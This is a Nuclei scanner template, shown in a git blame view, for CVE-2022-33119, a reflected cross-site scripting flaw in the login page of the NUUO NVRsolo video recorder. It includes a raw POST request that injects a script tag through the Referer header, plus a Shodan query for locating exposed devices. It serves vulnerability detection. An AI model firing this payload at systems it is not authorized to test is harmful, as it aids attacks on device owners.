nuclei-templates/http/cves/2022/CVE-2022-33119.yaml

47 lines
1.4 KiB
YAML
Raw Normal View History

2022-07-28 14:47:17 +00:00
id: CVE-2022-33119
info:
name: NUUO NVRsolo Video Recorder 03.06.02 - Cross-Site Scripting
2022-07-28 14:47:17 +00:00
author: arafatansari
severity: medium
2022-07-28 14:47:17 +00:00
description: |
NUUO NVRsolo Video Recorder 03.06.02 contains a reflected cross-site scripting vulnerability via login.php.
2023-09-06 11:59:08 +00:00
remediation: |
Apply the latest security patch or upgrade to a non-vulnerable version of the NUUO NVRsolo Video Recorder software.
2022-07-29 08:47:39 +00:00
reference:
- https://github.com/badboycxcc/nuuo-xss/blob/main/README.md
- https://nvd.nist.gov/vuln/detail/CVE-2022-33119
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2022-33119
cwe-id: CWE-79
2023-08-31 11:46:18 +00:00
epss-score: 0.02006
epss-percentile: 0.87424
2023-09-06 11:59:08 +00:00
cpe: cpe:2.3:o:nuuo:nvrsolo_firmware:03.06.02:*:*:*:*:*:*:*
2022-07-28 14:47:17 +00:00
metadata:
2023-06-04 08:13:42 +00:00
verified: true
2023-09-06 11:59:08 +00:00
max-request: 1
2023-07-11 19:49:27 +00:00
vendor: nuuo
product: nvrsolo_firmware
2023-09-06 11:59:08 +00:00
shodan-query: http.html:"NVRsolo"
2022-07-29 08:47:39 +00:00
tags: cve,cve2022,nvrsolo,xss
2022-07-28 14:47:17 +00:00
http:
2022-07-28 14:47:17 +00:00
- raw:
- |
POST /login.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
2022-07-29 08:47:39 +00:00
Referer: "><script>alert(document.domain)</script><"
2022-07-28 14:47:17 +00:00
language=en&user=user&pass=pass&submit=Login
matchers:
2022-07-29 08:47:39 +00:00
- type: dsl
dsl:
- 'contains(header, "text/html")'
2022-07-29 08:47:39 +00:00
- 'status_code == 200'
- contains(body,'<script>alert(document.domain)</script><\"?cmd=')
condition: and